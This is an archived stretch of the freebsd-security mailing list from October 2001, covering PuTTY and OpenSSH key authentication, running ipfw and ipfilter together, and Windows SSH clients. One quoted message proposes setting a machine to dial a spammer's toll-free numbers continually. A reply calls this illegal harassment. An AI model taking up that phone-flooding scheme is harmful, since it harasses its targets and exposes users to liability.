kex: 
server->client 3des-cbc > hmac-sha1 none > Oct 25 14:18:14 strawberry sshd[15696]: debug1: Wait SSH2_MSG_KEXDH_INIT. > Oct 25 14:18:14 strawberry sshd[15696]: debug1: bits set: 521/1024 > Oct 25 14:18:14 strawberry sshd[15696]: debug1: bits set: 497/1024 > Oct 25 14:18:14 strawberry sshd[15696]: debug1: sig size 20 20 > Oct 25 14:18:14 strawberry sshd[15696]: debug1: send SSH2_MSG_NEWKEYS. > Oct 25 14:18:14 strawberry sshd[15696]: debug1: done: send SSH2_MSG_NEWKEYS. > Oct 25 14:18:14 strawberry sshd[15696]: debug1: Wait SSH2_MSG_NEWKEYS. > Oct 25 14:18:15 strawberry sshd[15696]: debug1: GOT SSH2_MSG_NEWKEYS. > Oct 25 14:18:15 strawberry sshd[15696]: debug1: done: KEX2. > Oct 25 14:18:17 strawberry sshd[15696]: fatal: Read from socket failed: > Connection reset by peer > Oct 25 14:18:17 strawberry sshd[15696]: debug1: Calling cleanup > 0x805e72c(0x0) > > Any pointers would be highly appreciated Tom > > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-security" in the body of the message > To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Oct 26 8: 5:16 2001 Delivered-To: freebsd-security@freebsd.org Received: from mail.wlcg.com (mail.wlcg.com [198.92.199.5]) by hub.freebsd.org (Postfix) with ESMTP id 8829037B409 for ; Fri, 26 Oct 2001 08:05:09 -0700 (PDT) Received: (from root@localhost) by mail.wlcg.com (8.11.6/8.11.6) id f9QF59F48571; Fri, 26 Oct 2001 11:05:09 -0400 (EDT) (envelope-from rsimmons@wlcg.com) Received: from localhost (rsimmons@localhost) by mail.wlcg.com (8.11.6/8.11.6) with ESMTP id f9QF55t48561; Fri, 26 Oct 2001 11:05:06 -0400 (EDT) (envelope-from rsimmons@wlcg.com) X-Authentication-Warning: mail.wlcg.com: rsimmons owned process doing -bs Date: Fri, 26 Oct 2001 11:05:02 -0400 (EDT) From: Rob Simmons To: Alexei Zakirov Cc: "Nickolay A.Kritsky" , Subject: Re: ipfw and ipf on one box In-Reply-To: Message-ID: 
<20011026110215.O88733-100000@mail.wlcg.com> MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII X-Virus-Scanned: by AMaViS perl-10 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org -----BEGIN PGP SIGNED MESSAGE----- Hash: RIPEMD160 Has anyone had any luck getting dummynet to work with ipfilter? In LINT it mentions that you need IPFIREWALL with dummynet. Can IPFILTER be substituted? Robert Simmons Systems Administrator http://www.wlcg.com/ On Fri, 26 Oct 2001, Alexei Zakirov wrote: > On Fri, 26 Oct 2001, Nickolay A.Kritsky wrote: > > > Hi all. > > > > Has anybody an experience of concurrent work of ipfw and ipfilter on > > one FreeBSD box? Is it possible? What will be the order of packets > > yes it's possible. I'm using this combination to get an in-kernel ipf NAT > and ipfw working together. > > As I can see order is following: > PKT -> (ipnat) -> (ipfilter) -> (ipfw) -> (bpf) -> INTERFACE OUT > > PKT <- (ipfw) <- (ipf) <- (ipnat) <- (bpf) <- INTERFACE IN > > *** WBR, Alexei Zakirov (frank@unshadow.net) > > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-security" in the body of the message > -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.0.6 (FreeBSD) Comment: For info see http://www.gnupg.org iD8DBQE72Xuhv8Bofna59hYRA9ijAJ0aGDGrMsvh9jnRmkbnQTnlwvSRawCeJ6r0 XLAzRWBJerVjsqsyKCjYJq4= =YhIH -----END PGP SIGNATURE----- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Oct 26 8: 7:15 2001 Delivered-To: freebsd-security@freebsd.org Received: from va.cs.wm.edu (va.cs.wm.edu [128.239.2.31]) by hub.freebsd.org (Postfix) with ESMTP id 524AD37B405 for ; Fri, 26 Oct 2001 08:07:08 -0700 (PDT) Received: from corona.cs.wm.edu (corona [128.239.2.50]) by va.cs.wm.edu (8.11.4/8.9.1) with ESMTP id f9QF5rq09844 for 
; Fri, 26 Oct 2001 11:05:53 -0400 (EDT) Received: (from zvezdan@localhost) by corona.cs.wm.edu (8.11.6/8.9.1) id f9QF77p07761 for security@FreeBSD.ORG; Fri, 26 Oct 2001 11:07:07 -0400 Date: Fri, 26 Oct 2001 11:07:07 -0400 From: Zvezdan Petkovic To: security@FreeBSD.ORG Subject: Re: Putty & SSH Message-ID: <20011026110707.B7631@corona.cs.wm.edu> Mail-Followup-To: security@FreeBSD.ORG References: Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline User-Agent: Mutt/1.2.5i In-Reply-To: ; from Bill.Melvin@esc.edu on Fri, Oct 26, 2001 at 10:39:52AM -0400 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org On Fri, Oct 26, 2001 at 10:39:52AM -0400, Bill.Melvin@esc.edu wrote: > > I try to connect from my M$ to a Freebsd Box using Putty via > > SSH. The keys were produced with the normal procedure > > under BSD ... > > user@fbsdbox $ ssh -V > SSH Version OpenSSH_2.3.0 ... > ^^^^^^^ > > http://www.chiark.greenend.org.uk/~sgtatham/putty/faq.html#A.1.2 > Yes, but one can convert the keys in the SECSH Public Key Format using ssh-keygen -e private-or-public-OpenSSH-key-file-name >file.pub The conversion from SECSH (SSH2 compatible) format to OpenSSH is done with ssh-keygen -i private-SECSH-key-file-name >private-file ssh-keygen -i public-SECSH-key-file-name >file.pub I successfully imported the keys from the commercial SSH2 on an AIX machine and exported my public OpenSSH key to that AIX machine. Now, will that help putty I've no idea. I do not use Windows for anything except DVD movies. :-) Notice also OpenSSH keeps all authorized keys in a file authorized_keys [authorized_keys2 is deprecated and read only since version 2.9.9], while the commercial SSH2 uses a file called authorization which has the content: key file.pub ... 
Again, how this works in putty I do not know, but if it's reasonable to suppose it works similar. Isn't it? -- Zvezdan Petkovic http://www.cs.wm.edu/~zvezdan/ To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Oct 26 8:13:20 2001 Delivered-To: freebsd-security@freebsd.org Received: from va.cs.wm.edu (va.cs.wm.edu [128.239.2.31]) by hub.freebsd.org (Postfix) with ESMTP id 53CB637B406 for ; Fri, 26 Oct 2001 08:13:18 -0700 (PDT) Received: from corona.cs.wm.edu (corona [128.239.2.50]) by va.cs.wm.edu (8.11.4/8.9.1) with ESMTP id f9QFC3q09925 for ; Fri, 26 Oct 2001 11:12:03 -0400 (EDT) Received: (from zvezdan@localhost) by corona.cs.wm.edu (8.11.6/8.9.1) id f9QFDH307775 for security@FreeBSD.ORG; Fri, 26 Oct 2001 11:13:17 -0400 Date: Fri, 26 Oct 2001 11:13:17 -0400 From: Zvezdan Petkovic To: security@FreeBSD.ORG Subject: Re: Putty & SSH Message-ID: <20011026111311.C7631@corona.cs.wm.edu> Mail-Followup-To: security@FreeBSD.ORG References: <20011026110707.B7631@corona.cs.wm.edu> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline User-Agent: Mutt/1.2.5i In-Reply-To: <20011026110707.B7631@corona.cs.wm.edu>; from zvezdan@CS.WM.EDU on Fri, Oct 26, 2001 at 11:07:07AM -0400 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org On Fri, Oct 26, 2001 at 11:07:07AM -0400, Zvezdan Petkovic wrote: > On Fri, Oct 26, 2001 at 10:39:52AM -0400, Bill.Melvin@esc.edu wrote: > > > I try to connect from my M$ to a Freebsd Box using Putty via > > > SSH. The keys were produced with the normal procedure > > > under BSD ... > > > > user@fbsdbox $ ssh -V > > SSH Version OpenSSH_2.3.0 ... 
> > ^^^^^^^ > > > > http://www.chiark.greenend.org.uk/~sgtatham/putty/faq.html#A.1.2 > > > > Yes, but one can convert the keys in the SECSH Public Key Format using > > ssh-keygen -e private-or-public-OpenSSH-key-file-name >file.pub > > > > Now, will that help putty I've no idea. Ooops! I've just checked that web site more carefully and realised that putty is a beast of a totally different sort. I "like" his explanation that neither OpenSSH not SSH2 formats are particularly pleasant so he uses his own. Does he at least support SECSH proposed standard, in which case my suggestion above might be helpful? Otherwise, bad luck. -- Zvezdan Petkovic http://www.cs.wm.edu/~zvezdan/ To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Oct 26 8:20:28 2001 Delivered-To: freebsd-security@freebsd.org Received: from cactus.fi.uba.ar (cactus.fi.uba.ar [157.92.49.108]) by hub.freebsd.org (Postfix) with ESMTP id B5CEB37B407 for ; Fri, 26 Oct 2001 08:20:17 -0700 (PDT) Received: from cactus.fi.uba.ar (cactus.fi.uba.ar [157.92.49.108]) by cactus.fi.uba.ar (8.11.6/8.11.6) with ESMTP id f9QFHVs11444; Fri, 26 Oct 2001 12:17:37 -0300 (ART) (envelope-from fgleiser@cactus.fi.uba.ar) Date: Fri, 26 Oct 2001 12:17:31 -0300 (ART) From: Fernando Gleiser To: Rob Simmons Cc: Subject: Re: ipfw and ipf on one box In-Reply-To: <20011026110215.O88733-100000@mail.wlcg.com> Message-ID: <20011026121235.A10039-100000@cactus.fi.uba.ar> MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org On Fri, 26 Oct 2001, Rob Simmons wrote: > -----BEGIN PGP SIGNED MESSAGE----- > Hash: RIPEMD160 > > Has anyone had any luck getting dummynet to work with ipfilter? In LINT > it mentions that you need IPFIREWALL with dummynet. 
Can IPFILTER be > substituted? I am using dummynet and ipfilter together. I add "options IPFIREWALL", "options IPFIREWALL_DEFAULT_TO_ACCEPT" and "options DUMMYNET" in the kernel config and load ipl.ko to use the KLD version of IP Filter. Note this should work with the in kernel version too. That way, you use dummynet for traffic shaping and ipf for NAT/Filtering. Fer > > Robert Simmons > Systems Administrator > http://www.wlcg.com/ > > On Fri, 26 Oct 2001, Alexei Zakirov wrote: > > > On Fri, 26 Oct 2001, Nickolay A.Kritsky wrote: > > > > > Hi all. > > > > > > Has anybody an experience of concurrent work of ipfw and ipfilter on > > > one FreeBSD box? Is it possible? What will be the order of packets > > > > yes it's possible. I'm using this combination to get an in-kernel ipf NAT > > and ipfw working together. > > > > As I can see order is following: > > PKT -> (ipnat) -> (ipfilter) -> (ipfw) -> (bpf) -> INTERFACE OUT > > > > PKT <- (ipfw) <- (ipf) <- (ipnat) <- (bpf) <- INTERFACE IN > > > > *** WBR, Alexei Zakirov (frank@unshadow.net) > > > > > > To Unsubscribe: send mail to majordomo@FreeBSD.org > > with "unsubscribe freebsd-security" in the body of the message > > > -----BEGIN PGP SIGNATURE----- > Version: GnuPG v1.0.6 (FreeBSD) > Comment: For info see http://www.gnupg.org > > iD8DBQE72Xuhv8Bofna59hYRA9ijAJ0aGDGrMsvh9jnRmkbnQTnlwvSRawCeJ6r0 > XLAzRWBJerVjsqsyKCjYJq4= > =YhIH > -----END PGP SIGNATURE----- > > > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-security" in the body of the message > To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Oct 26 8:21:17 2001 Delivered-To: freebsd-security@freebsd.org Received: from shikima.mine.nu (pc1-card3-0-cust143.cdf.cable.ntl.com [62.252.49.143]) by hub.freebsd.org (Postfix) with ESMTP id B33AE37B401 for ; Fri, 26 Oct 2001 08:21:12 -0700 (PDT) Received: from rasputin by shikima.mine.nu with 
local (Exim 3.33 #1) id 15x8o7-0005KB-00 for security@freebsd.org; Fri, 26 Oct 2001 16:22:03 +0100 Date: Fri, 26 Oct 2001 16:22:03 +0100 From: Rasputin To: security@freebsd.org Subject: Re: Putty & SSH Message-ID: <20011026162203.A20432@shikima.mine.nu> Reply-To: Rasputin References: <20011026110707.B7631@corona.cs.wm.edu> <20011026111311.C7631@corona.cs.wm.edu> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline User-Agent: Mutt/1.2.5i In-Reply-To: <20011026111311.C7631@corona.cs.wm.edu>; from zvezdan@CS.WM.EDU on Fri, Oct 26, 2001 at 11:13:17AM -0400 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org * Zvezdan Petkovic [011026 16:15]: > > Now, will that help putty I've no idea. > Ooops! I've just checked that web site more carefully and realised that > putty is a beast of a totally different sort. I "like" his explanation > that neither OpenSSH not SSH2 formats are particularly pleasant so he > uses his own. Does he at least support SECSH proposed standard, in which > case my suggestion above might be helpful? Otherwise, bad luck. If you just want to save yourself a lot of grief, try teraterm with the ttssh plugin - see: http://www.zip.com.au/~roca/ttssh.html Not sure if it's any better, but it's a free 5 minute download to find out :) -- It is one of the superstitions of the human mind to have imagined that virginity could be a virtue. 
-- Voltaire Rasputin :: Jack of All Trades - Master of Nuns :: To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Oct 26 8:31:21 2001 Delivered-To: freebsd-security@freebsd.org Received: from va.cs.wm.edu (va.cs.wm.edu [128.239.2.31]) by hub.freebsd.org (Postfix) with ESMTP id 5187137B405 for ; Fri, 26 Oct 2001 08:31:15 -0700 (PDT) Received: from corona.cs.wm.edu (corona [128.239.2.50]) by va.cs.wm.edu (8.11.4/8.9.1) with ESMTP id f9QFU0q10185 for ; Fri, 26 Oct 2001 11:30:00 -0400 (EDT) Received: (from zvezdan@localhost) by corona.cs.wm.edu (8.11.6/8.9.1) id f9QFVE607858 for security@FreeBSD.ORG; Fri, 26 Oct 2001 11:31:14 -0400 Date: Fri, 26 Oct 2001 11:31:14 -0400 From: Zvezdan Petkovic To: security@FreeBSD.ORG Subject: Re: Putty & SSH Message-ID: <20011026113108.A7849@corona.cs.wm.edu> Mail-Followup-To: security@FreeBSD.ORG References: <20011026110707.B7631@corona.cs.wm.edu> <20011026111311.C7631@corona.cs.wm.edu> <20011026162203.A20432@shikima.mine.nu> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline User-Agent: Mutt/1.2.5i In-Reply-To: <20011026162203.A20432@shikima.mine.nu>; from rasputin@submonkey.net on Fri, Oct 26, 2001 at 04:22:03PM +0100 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org On Fri, Oct 26, 2001 at 04:22:03PM +0100, Rasputin wrote: > If you just want to save yourself a lot of grief, try teraterm > with the ttssh plugin - see: I save myself grief by not using Windows :-) -- Zvezdan Petkovic http://www.cs.wm.edu/~zvezdan/ To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Oct 26 8:41:42 2001 Delivered-To: freebsd-security@freebsd.org Received: from gatehouse.quadtelecom.com 
(ool-18bd6caa.dyn.optonline.net [24.189.108.170]) by hub.freebsd.org (Postfix) with SMTP id 7B2E037B401 for ; Fri, 26 Oct 2001 08:41:36 -0700 (PDT) Received: (qmail 56038 invoked from network); 26 Oct 2001 15:28:00 -0000 Received: from 201.baltimore-02rh16rt.md.dial-access.att.net (HELO quadtelecom.com) (12.79.107.201) by 26.mumf.nyrk.nycenycp.dsl.att.net with SMTP; 26 Oct 2001 15:28:00 -0000 Message-ID: <3BD980FF.389F5842@quadtelecom.com> Date: Fri, 26 Oct 2001 11:27:59 -0400 From: Harry Tabak Reply-To: htabak@quadtelecom.com X-Mailer: Mozilla 4.76 [en] (Windows NT 5.0; U) X-Accept-Language: en MIME-Version: 1.0 To: Steve Littleford Cc: security@freebsd.org Subject: Re: Toner Cartridges References: <3BD59381.1000500@all.org> Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org IANAL, but I believe the attact that you are proposing is considered harassment and would leave you exposed to both criminal and civil liability. And yes, your calls can be traced. - Harry Steve Littleford wrote: > > Everyone, > > I know spam is a fact of life, but these guys have a reputation for > being jerks (or Toner weasels, if you prefer). > http://www.ecst.csuchico.edu/~atman/spam/ > > > **** VORTEX SUPPLIES **** > > ... > > > ORDER BY PHONE:1-888-288-9043 > > > ORDER BY FAX: 1-888-977-1577 > > E-MAIL REMOVAL LINE: 1-888-494-8597 > > > Since this is a security list, could someone tell me what security > problems I might run into if my FreeBSD machine were configured to call > these 1-888 numbers continually? Aside from the hardware about two or > three modems? Is it possible to assign this task to a non-root thread? > > > -Steve > > (gee, what do I do with these spare modems and Digi-Board?) 
> > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-security" in the body of the message To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Oct 26 8:45:45 2001 Delivered-To: freebsd-security@freebsd.org Received: from sln.esc.edu (sln.esc.edu [138.116.200.3]) by hub.freebsd.org (Postfix) with ESMTP id CC3F237B403 for ; Fri, 26 Oct 2001 08:45:42 -0700 (PDT) To: Rasputin Cc: security@freebsd.org Subject: Re: Putty & SSH X-Mailer: Lotus Notes Release 5.0.2c February 2, 2000 Message-ID: From: Bill.Melvin@esc.edu Date: Fri, 26 Oct 2001 11:41:36 -0400 X-MIMETrack: Serialize by Router on sln.esc.edu/SUNY(Release 5.0.2c |February 2, 2000) at 10/26/2001 11:44:22 AM, Serialize complete at 10/26/2001 11:44:22 AM MIME-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org > If you just want to save yourself a lot of grief, try teraterm > with the ttssh plugin - see: > http://www.zip.com.au/~roca/ttssh.html > Not sure if it's any better, but it's a free 5 minute download to > find out :) Doesn't do Protocol 2 ... From the top of the above link. "Many people ask me whether or not TTSSH will support SSH protocol version 2. It does not and (unless someone else decides to try) it will not. Sorry, I don't have time to do it. Please don't ask me about it." You can still do 1 with a FreeBSD sshd but you are rolling the dice on the CRC-32 patches to the daemon (TTSSH itself claims not to be vulnerable). 
(below for the "L4m3rz use Windows/Grow up, I have to use Windows" debate that inevitably follows every "Windows SSH client" question on this list :-) The Cygwin kit (http://www.cygwin.com) uses OpenSSH 2.9.9p2 at least plus gives you a "real" shell and utilities if you don't mind the GPL. /b To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Oct 26 8:52:15 2001 Delivered-To: freebsd-security@freebsd.org Received: from dreamflow.nl (dreamflow.nl [62.58.36.22]) by hub.freebsd.org (Postfix) with SMTP id 1D40237B407 for ; Fri, 26 Oct 2001 08:52:11 -0700 (PDT) Received: (qmail 24470 invoked by uid 1000); 26 Oct 2001 15:52:09 -0000 Date: Fri, 26 Oct 2001 17:52:09 +0200 From: Bart Matthaei To: freebsd-security@freebsd.org Subject: Re: Putty & SSH Message-ID: <20011026175209.A24453@heresy.dreamflow.nl> Reply-To: Bart Matthaei References: <20011026110707.B7631@corona.cs.wm.edu> <20011026111311.C7631@corona.cs.wm.edu> <20011026162203.A20432@shikima.mine.nu> <20011026113108.A7849@corona.cs.wm.edu> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline User-Agent: Mutt/1.2.5i In-Reply-To: <20011026113108.A7849@corona.cs.wm.edu>; from zvezdan@CS.WM.EDU on Fri, Oct 26, 2001 at 11:31:14AM -0400 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org On Fri, Oct 26, 2001 at 11:31:14AM -0400, Zvezdan Petkovic wrote: [snap] > I save myself grief by not using Windows :-) This is a security list. Not a unix <-> windows flamewall. :) Regards, Bart -- Bart Matthaei bart@dreamflow.nl /* Welcome to my world.. 
You just live in it */ To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Oct 26 9: 7:53 2001 Delivered-To: freebsd-security@freebsd.org Received: from va.cs.wm.edu (va.cs.wm.edu [128.239.2.31]) by hub.freebsd.org (Postfix) with ESMTP id 28E9537B401 for ; Fri, 26 Oct 2001 09:07:51 -0700 (PDT) Received: from corona.cs.wm.edu (corona [128.239.2.50]) by va.cs.wm.edu (8.11.4/8.9.1) with ESMTP id f9QG6Wq10547 for ; Fri, 26 Oct 2001 12:06:36 -0400 (EDT) Received: (from zvezdan@localhost) by corona.cs.wm.edu (8.11.6/8.9.1) id f9QG7kk07934 for freebsd-security@FreeBSD.ORG; Fri, 26 Oct 2001 12:07:46 -0400 Date: Fri, 26 Oct 2001 12:07:46 -0400 From: Zvezdan Petkovic To: freebsd-security@FreeBSD.ORG Subject: Re: Putty & SSH Message-ID: <20011026120745.A7897@corona.cs.wm.edu> Mail-Followup-To: freebsd-security@FreeBSD.ORG References: <20011026110707.B7631@corona.cs.wm.edu> <20011026111311.C7631@corona.cs.wm.edu> <20011026162203.A20432@shikima.mine.nu> <20011026113108.A7849@corona.cs.wm.edu> <20011026175209.A24453@heresy.dreamflow.nl> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline User-Agent: Mutt/1.2.5i In-Reply-To: <20011026175209.A24453@heresy.dreamflow.nl>; from bart@dreamflow.nl on Fri, Oct 26, 2001 at 05:52:09PM +0200 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org On Fri, Oct 26, 2001 at 05:52:09PM +0200, Bart Matthaei wrote: > On Fri, Oct 26, 2001 at 11:31:14AM -0400, Zvezdan Petkovic wrote: > [snap] > > I save myself grief by not using Windows :-) > > This is a securitylist. Not a unix <-> windows flamewall. :) Wasn't intended as a flame. Sorry if somebody perceived it that way. 
If you look at the thread you'll see that I tried to offer some constructive advice on how to convert between OpenSSH<->SECSH pub key formats. That might, or might not have been helpful to the original poster. You sound as an adult reprimanding a kid who's smirking at people. I'm using UNIX for over 12 years, and that is a "natural habitat" for me. _I_ would probably be in a lot of grief trying to switch to Win. That definitely does _not_ necessarily hold for other people. I'm sorry for misunderstanding. -- Zvezdan Petkovic http://www.cs.wm.edu/~zvezdan/ To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Oct 26 9:19:43 2001 Delivered-To: freebsd-security@freebsd.org Received: from topperwein.dyndns.org (acs-24-154-28-168.zoominternet.net [24.154.28.168]) by hub.freebsd.org (Postfix) with ESMTP id 546EE37B407 for ; Fri, 26 Oct 2001 09:19:41 -0700 (PDT) Received: from topperwein.dyndns.org (topperwein.dyndns.org [192.168.168.10]) by topperwein.dyndns.org (8.11.6/8.11.6) with ESMTP id f9QGJil03883 for ; Fri, 26 Oct 2001 12:19:44 -0400 (EDT) (envelope-from behanna@zbzoom.net) Date: Fri, 26 Oct 2001 12:19:39 -0400 (EDT) From: Chris BeHanna Reply-To: Chris BeHanna To: Subject: Re: Putty & SSH In-Reply-To: <20011026110707.B7631@corona.cs.wm.edu> Message-ID: <20011026121148.H3805-100000@topperwein.dyndns.org> MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org > On Fri, Oct 26, 2001 at 10:39:52AM -0400, Bill.Melvin@esc.edu wrote: > > > I try to connect from my M$ to a Freebsd Box using Putty via > > > SSH. The keys were produced with the normal procedure > > > under BSD ... 
I've found that using Pageant to cache the keys allows you to do what you want to do (much like ssh-agent works on real operating systems--and, as mentioned, Cygwin has real ssh, including a real ssh-agent, and you can even run sshd and get into your Windows box remotely, but only as the currently-logged-in user). -- Chris BeHanna Software Engineer (Remove "bogus" before responding.) behanna@bogus.zbzoom.net I was raised by a pack of wild corn dogs. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Oct 26 9:27:48 2001 Delivered-To: freebsd-security@freebsd.org Received: from kosh.etchings.com (kosh.etchings.com [216.231.38.40]) by hub.freebsd.org (Postfix) with ESMTP id 0282A37B405 for ; Fri, 26 Oct 2001 09:27:42 -0700 (PDT) Received: by kosh.etchings.com (Postfix, from userid 1000) id 524C4117040; Fri, 26 Oct 2001 09:27:41 -0700 (PDT) Received: from localhost (localhost [127.0.0.1]) by kosh.etchings.com (Postfix) with ESMTP id 5144011703F; Fri, 26 Oct 2001 09:27:41 -0700 (PDT) Date: Fri, 26 Oct 2001 09:27:41 -0700 (PDT) From: Brian Kraemer To: Tom Beer Cc: Subject: Re: Putty & SSH In-Reply-To: <006801c15dee$471d80c0$0901a8c0@system> Message-ID: <20011026092247.P2138-100000@kosh.etchings.com> MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org The putty developers had/have some security concerns with DSA keys (what most ssh 2.0 implementations use) so they don't support them. There is hope however; Here's an exchange I had with one of the putty developers. 
-Brian Date: Thu, 13 Sep 2001 08:58:33 +0100 From: Simon Tatham To: Brian Kraemer Subject: Re: [putty]public key authentication for ssh 2 Brian Kraemer wrote: > The section about DSA keys in your "non-wish list" on the putty web page > seems to indicate that public key authentication for ssh 2 is not > implemented at all (and probably won't be). Is this a true statement? Not any more. It was at the time of the 0.51 release, but since then the major SSH server implementors have introduced the possibility of RSA keys in SSH 2, and the development snapshots of PuTTY and PuTTYgen do support it, as will the upcoming 0.52 release. > Can you use RSA (or another type) keys with ssh 2? Sorry, I'm not > completely up to speed on all the workings of SSH/SSH2. That's perfectly all right. SSH 2 has inherent support for multiple key types, but RSA was only introduced to the drafts fairly recently, so you could easily be forgiven for not having known about it yet :-) To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Oct 26 9:56:44 2001 Delivered-To: freebsd-security@freebsd.org Received: from gatehouse.quadtelecom.com (ool-18bd6caa.dyn.optonline.net [24.189.108.170]) by hub.freebsd.org (Postfix) with SMTP id 038E537B401 for ; Fri, 26 Oct 2001 09:56:39 -0700 (PDT) Received: (qmail 56204 invoked from network); 26 Oct 2001 16:49:46 -0000 Received: from 49.baltimore-03rh16rt.md.dial-access.att.net (HELO quadtelecom.com) (12.79.109.49) by 26.mumf.nyrk.nycenycp.dsl.att.net with SMTP; 26 Oct 2001 16:49:46 -0000 Message-ID: <3BD99429.FEC70F35@quadtelecom.com> Date: Fri, 26 Oct 2001 12:49:45 -0400 From: Harry Tabak Reply-To: htabak@quadtelecom.com X-Mailer: Mozilla 4.76 [en] (Windows NT 5.0; U) X-Accept-Language: en MIME-Version: 1.0 To: Tom Beer Cc: security@FreeBSD.ORG Subject: Re: Putty & SSH References: <006801c15dee$471d80c0$0901a8c0@system> Content-Type: text/plain; charset=us-ascii 
Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org I have been able to successfully use Putty to access a FBSD box using SSH1. I used the RSA defaults to get an identity and identity.pub files and I copied the identity.pub to authorized_keys. Your problems seem to be some sort of config issue. Is putty configured to provide your logon name, and the identity file's location? I have not been successful using SSH2. - Harry Tom Beer wrote: > > Hi, > > I try to connect from my M$ to a Freebsd Box using Putty via > SSH. The keys were produced with the normal procedure > under BSD. However, it is not possible to connect without entering > a user name and password. This fails, cause I only want to connect > via the ssh key and configured sshd in that way. The log on BSD reads as > follows: > > Oct 25 14:18:14 strawberry sshd[158]: debug1: Forked child 15696. 
